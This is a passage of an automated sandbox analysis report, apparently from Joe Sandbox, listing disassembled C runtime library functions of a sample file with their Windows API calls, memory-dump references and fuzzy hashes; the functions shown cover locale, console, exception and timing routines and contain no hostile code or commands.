                                                                                                                                                                                                                                                                            • Part of subcall function 008905D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00891D78,?,00000000,-00000008), ref: 00890632
                                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 008975C8
                                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 008975E8
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 158306478-0
                                                                                                                                                                                                                                                                          • Opcode ID: cd2ea9ece118dc12c1048e70e20139ca8cd194c087b780dd6513e96950fb2fc1
                                                                                                                                                                                                                                                                          • Instruction ID: ef4a21da9e725d7ed52f21b1324b22f95755c57a23e1a993ddea37e2bd7c27c4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd2ea9ece118dc12c1048e70e20139ca8cd194c087b780dd6513e96950fb2fc1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC1104E2A15A197EBE1277B99C89C7F296CFE5A3987180424F901E1501FB64CD0185BA
                                                                                                                                                                                                                                                                          Function 0088328F Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00883296
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 008832A0
                                                                                                                                                                                                                                                                            • Part of subcall function 00874360: std::_Lockit::_Lockit.LIBCPMT ref: 0087438E
                                                                                                                                                                                                                                                                            • Part of subcall function 00874360: std::_Lockit::~_Lockit.LIBCPMT ref: 008743B9
                                                                                                                                                                                                                                                                          • codecvt.LIBCPMT ref: 008832DA
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00883311
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3716348337-0
                                                                                                                                                                                                                                                                          • Opcode ID: a41d8a334b7c6957b718284f2bf915646577035a121bc478aee3655e80ecf3c0
                                                                                                                                                                                                                                                                          • Instruction ID: 974a46d113229fca1503357f56c42475d1e5cf1765ec2ce04350511d217e4a18
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a41d8a334b7c6957b718284f2bf915646577035a121bc478aee3655e80ecf3c0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF01AD32A002198BDB05BBA8E815AAE77B5FF91B10F140409F406EB391DF70DE01CB92
                                                                                                                                                                                                                                                                          Function 0089F0B0 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,0089E59F,00000000,00000001,?,?,?,00898758,?,00000000,00000000), ref: 0089F0C7
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0089E59F,00000000,00000001,?,?,?,00898758,?,00000000,00000000,?,?,?,0089809E,?), ref: 0089F0D3
                                                                                                                                                                                                                                                                            • Part of subcall function 0089F124: CloseHandle.KERNEL32(FFFFFFFE,0089F0E3,?,0089E59F,00000000,00000001,?,?,?,00898758,?,00000000,00000000,?,?), ref: 0089F134
                                                                                                                                                                                                                                                                          • ___initconout.LIBCMT ref: 0089F0E3
                                                                                                                                                                                                                                                                            • Part of subcall function 0089F105: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0089F0A1,0089E58C,?,?,00898758,?,00000000,00000000,?), ref: 0089F118
                                                                                                                                                                                                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,0089E59F,00000000,00000001,?,?,?,00898758,?,00000000,00000000,?), ref: 0089F0F8
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2744216297-0
                                                                                                                                                                                                                                                                          • Opcode ID: 5696daa3f2db41ee5a5dddea7522a52efbcdc4270e40ae0c73b0876dc8266703
                                                                                                                                                                                                                                                                          • Instruction ID: eb1acd2c65c42a3bb37e68b3e64d5b3fb26ca61da44227b472ee3c1f129a7265
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5696daa3f2db41ee5a5dddea7522a52efbcdc4270e40ae0c73b0876dc8266703
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CDF0AC36500125BBDF262FD5DC089993F66FF493A1B094420FB19D5531E7328820DBD5
                                                                                                                                                                                                                                                                          Function 00884C10 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00884C22
                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00884C31
                                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 00884C3A
                                                                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00884C47
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                          • Opcode ID: d915283fc15a07c773fd22d9284ef662635aa3559e6cdca3190c7d95302b16ef
                                                                                                                                                                                                                                                                          • Instruction ID: fcadc8af5ba60e6c171950d35243c719d1267b673abbd06dbcf73fbb619925f7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d915283fc15a07c773fd22d9284ef662635aa3559e6cdca3190c7d95302b16ef
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3EF0AF30C0020CEBCB04DBF4C94999EBBF4FF1D200B914995A412E7910E730AA44DF51
                                                                                                                                                                                                                                                                          Function 00894D72 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00890713: GetLastError.KERNEL32(00000000,?,00892A49), ref: 00890717
                                                                                                                                                                                                                                                                            • Part of subcall function 00890713: SetLastError.KERNEL32(00000000,?,?,00000028,0088D2C9), ref: 008907B9
                                                                                                                                                                                                                                                                          • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,0088AB4D,?,?,?,00000055,?,-00000050,?,?,?), ref: 00894E31
                                                                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,0088AB4D,?,?,?,00000055,?,-00000050,?,?), ref: 00894E68
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                                                                                                          • String ID: utf8
                                                                                                                                                                                                                                                                          • API String ID: 943130320-905460609
                                                                                                                                                                                                                                                                          • Opcode ID: 08e78ecdc2270436373ee77c4e0c93795d798103257eaae58be8d4784bb64f9d
                                                                                                                                                                                                                                                                          • Instruction ID: 5dd24f579d8ddd01f8c23725cc6ef84124d3a5f1c9e2b7a9a6a1f77d2f6b6bf2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08e78ecdc2270436373ee77c4e0c93795d798103257eaae58be8d4784bb64f9d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E51F631A04306AAEF25BB78CC46FAA73A8FF49710F1C6429F515D7181FB70E9428766
                                                                                                                                                                                                                                                                          Function 0088FF48 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0088FE49,?,?,00000000,00000000,00000000,?), ref: 0088FF6D
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: EncodePointer
                                                                                                                                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                                                                                                                                          • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                                          • Opcode ID: 2ea20f0927d4791bf2e78e2cd171193030b379965adb0a24e2b5f7d97079e9f2
                                                                                                                                                                                                                                                                          • Instruction ID: 7cf0b2a250dc46fc7f9017e4dc8d519d243b01b8f50c70b7499270a41e48d9d6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ea20f0927d4791bf2e78e2cd171193030b379965adb0a24e2b5f7d97079e9f2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18414972900509AFDF16EF98CD81AEEBBB5FF48300F188069FA04A7262D7359990DF51
                                                                                                                                                                                                                                                                          Function 0088F7B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0088FA2B
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                                                                                                                                          • API String ID: 3493665558-3733052814
                                                                                                                                                                                                                                                                          • Opcode ID: c669e1417f81cf9df9e165520913f6f6e087970e66c0adf4dafb2b93cde3a989
                                                                                                                                                                                                                                                                          • Instruction ID: 21904da85d1ad83a8dd8e7b3242ed5dd6ea30c28a4891051c14d947a216f9881
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c669e1417f81cf9df9e165520913f6f6e087970e66c0adf4dafb2b93cde3a989
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B31C4725002189BCF26AF54DC549AA7B65FF08339B18817AFE58CA123D332DDA1DB91
                                                                                                                                                                                                                                                                          Function 00881F82 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 0088200A
                                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(?,?,?,?), ref: 0088202F
                                                                                                                                                                                                                                                                            • Part of subcall function 00884D23: RaiseException.KERNEL32(E06D7363,00000001,00000003,00883ADE,?,?,?,?,00883ADE,00001000,008AAE2C,00001000), ref: 00884D84
                                                                                                                                                                                                                                                                            • Part of subcall function 0088D2B9: IsProcessorFeaturePresent.KERNEL32(00000017,00887E7B,?,?,?,?,00000000), ref: 0088D2D5
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                                                          • API String ID: 1924019822-1018135373
                                                                                                                                                                                                                                                                          • Opcode ID: c0f1d6b6543db55d6d1f8ba014990c0fc93c46d683ee17577ac8a22f3d9e6883
                                                                                                                                                                                                                                                                          • Instruction ID: 3cb77693833fb619a2a17be42c0b627e4dc5bac98b4e41ad941ab1b9e97bc65e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0f1d6b6543db55d6d1f8ba014990c0fc93c46d683ee17577ac8a22f3d9e6883
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C219F32D006189BCF25FF98D9859AEB7B9FF14714F14440AEA05EF250DB34AE45CB81

                                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                                          Function 00895DD3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,008957A4,00000002,00000000,?,?,?,008957A4,?,00000000), ref: 00895E6C
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,008957A4,00000002,00000000,?,?,?,008957A4,?,00000000), ref: 00895E95
                                                                                                                                                                                                                                                                          • GetACP.KERNEL32(?,?,008957A4,?,00000000), ref: 00895EAA
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                                                          • String ID: ACP$OCP
                                                                                                                                                                                                                                                                          • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                          • Opcode ID: 94ec411294fb939455e31950cc9efa7f4abb990b4da175028c329cf380a57ef1
                                                                                                                                                                                                                                                                          • Instruction ID: 4dd49cd13aca9d848ae5250d23ea7487b3642311b877c36c74e9ed97df8d4245
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94ec411294fb939455e31950cc9efa7f4abb990b4da175028c329cf380a57ef1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C216072A00904AAEF26AF55C904AAF73A6FB54F54B5E8424E90ADB500E733DF41C790
                                                                                                                                                                                                                                                                          Function 0089566E Relevance: 7.7, APIs: 5, Instructions: 182COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00890713: GetLastError.KERNEL32(00000000,?,00892A49), ref: 00890717
                                                                                                                                                                                                                                                                            • Part of subcall function 00890713: SetLastError.KERNEL32(00000000,?,?,00000028,0088D2C9), ref: 008907B9
                                                                                                                                                                                                                                                                          • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00895776
                                                                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 008957B4
                                                                                                                                                                                                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 008957C7
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0089580F
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0089582A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049198267.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049213513.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049240462.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 415426439-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2f5f085a59c0fc3b687805263b573d76d18dd92ba71e70908eb55150ca52ec5e
                                                                                                                                                                                                                                                                          • Instruction ID: 92eb5ecabd7da23b356b22ae3b174de0701f44197c38f0b1960c4070b8c5b2df
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f5f085a59c0fc3b687805263b573d76d18dd92ba71e70908eb55150ca52ec5e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C515F71A00609EFEF12EFA8CC45ABE77B8FF45700F1C4469A911E7691EB709A44CB61
                                                                                                                                                                                                                                                                          Function 0088E930 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2049136305.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049111683.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049163158.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2049180361.00000000008AC000.00000008.00000001.01000000.00000003.sdmpDownload File
